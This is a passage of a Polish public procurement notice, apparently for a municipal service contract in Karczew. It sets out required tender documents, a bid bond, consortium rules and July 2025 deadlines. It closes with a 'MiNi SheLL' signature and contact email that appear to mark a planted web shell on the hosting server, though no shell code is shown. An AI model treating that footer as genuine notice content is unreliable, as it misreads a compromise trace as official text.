125 ust. 5 ustawy Pzp, w zakresie wskazanym w punkcie 12. SWZ (w tym: w punkcie 12.1; 12.2; 12.7) i w punkcie 13. SWZ (w tym: w punkcie 13.1.4; 13.1.4.1), składane przez Podmiot/ty na zasoby którego powołuje się Wykonawca, sporządzone według wzoru stanowiącego Załącznik Nr 4a do SWZ;<br/>21.5.5. Zobowiązanie Podmiotu udostępniającego swoje zasoby na potrzeby Wykonawcy składającego ofertę, wymagane postanowieniami punktów 13.4 i 14.1.2 SWZ, sporządzone zgodnie z Załącznikiem Nr 5 do SWZ, lub inny podmiotowy środek dowodowy potwierdzający, że Wykonawca realizując zamówienie, będzie dysponował niezbędnymi zasobami tych Podmiotów – jeśli dotyczy;<br/>21.5.6. W przypadku składania oferty przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum, spółka cywilna) – Oświadczenie o którym mowa w art. 117 ust. 4 ustawy Pzp, określające, które dostawy lub usługi wykonają poszczególni Wykonawcy – w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia sporządzone zgodnie z Załącznikiem Nr 8 do SWZ;<br/>21.5.7. W przypadku składania oferty przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia – pełnomocnictwo do reprezentowania wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia, ewentualnie umowę o współdziałaniu, z której będzie wynikać przedmiotowe pełnomocnictwo. Pełnomocnik może być ustanowiony do reprezentowania Wykonawców w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego;<br/>21.5.8. dowód wniesienia wadium zgodnie z postanowieniami punktu 20 SWZ;<br/>21.5.9. Wyjaśnienia uzasadniające zastrzeżenie tajemnicy przedsiębiorstwa – jeżeli Wykonawca zastrzega takie informacje. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Wykonawca przystępujący do postępowania zobowiązany jest do wniesienia, przed upływem terminu składania ofert, wadium w wysokości 1 200,00 zł (słownie: jeden tysiąc dwieście złotych i 00/100). Wadium może być wnoszone według wyboru Wykonawcy w jednej lub kilku następujących formach: pieniądzu (przelewem); gwarancjach bankowych; gwarancjach ubezpieczeniowych; poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2024 r. poz. 419). Szczegółowe zapisy dotyczące wadium zostały określone w punkcie 20 Specyfikacji Warunków Zamówienia (SWZ). <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> [Numeracja zgodna z SWZ]:<br/>15.6. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty:<br/>15.6.1. Pełnomocnictwo ustanowione do reprezentowania Wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego;<br/>15.6.2. Oświadczenie o niepodleganiu wykluczeniu, spełnianiu warunków udziału w postępowaniu o którym mowa w art. 125 ust. 1 ustawy Pzp, w zakresie wskazanym w punkcie 12. SWZ (w tym: w punkcie 12.1; 12.2; 12.7) i w punkcie 13. SWZ (w tym: w punkcie 13.1.2; 13.1.2.1; 13.1.4; 13.1.4.1), dotyczące każdego ze wspólników, sporządzone według Załącznika Nr 4 do SWZ;<br/>15.6.3. Oświadczenie z którego wynika które dostawy lub usługi wykonają poszczególni Wykonawcy, o którym mowa w art. 117 ust. 4 ustawy Pzp, sporządzone według Załącznika Nr 8 do SWZ. Szczegółowe informacje zawarte są w punkcie 15 SWZ. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zmiana umowy dopuszczalna jest w przypadkach na warunkach określonych w Projektowanych Postanowieniach Umowy (PPU) – Załącznik Nr 2 do SWZ – w § 15. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-07-11 12:15</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://karczew.logintrade.net/zapytania_email,202998,2a782460536346be5351302ccc970a2b.html</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-07-11 12:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-08-08</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1. Zamawiający nie przewiduje: rozliczania w walutach obcych; zwrotu kosztów udziału w postępowaniu. 2. Wszystkie rozliczenia związane z niniejszym zamówieniem będą prowadzone w PLN. 3. Przed podpisaniem umowy Wykonawca zobowiązany jest do przedłożenia Zamawiającemu, dokumenty i informacje o których mowa w punkcie 27 SWZ. 4. Z postępowania o udzielenie zamówienia wyklucza się Wykonawcę w przypadkach, o których mowa w art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (t.j. Dz.U. z 2024 r. poz. 507 z późn. zm.). 5. Termin wykonania zamówienia: planowany termin rozpoczęcia realizacji usługi od 01.09.2025 r., zakończenie realizacji usługi 26.06.2026 r. 6.Ofertę należy złożyć za pośrednictwem Platformy przetargowej [adres w punkcie 8.2) niniejszego Ogłoszenia], nie później niż do dnia 11.07.2025 r. do godziny 12:15,00.

Creat By MiNi SheLL
Email: jattceo@gmail.com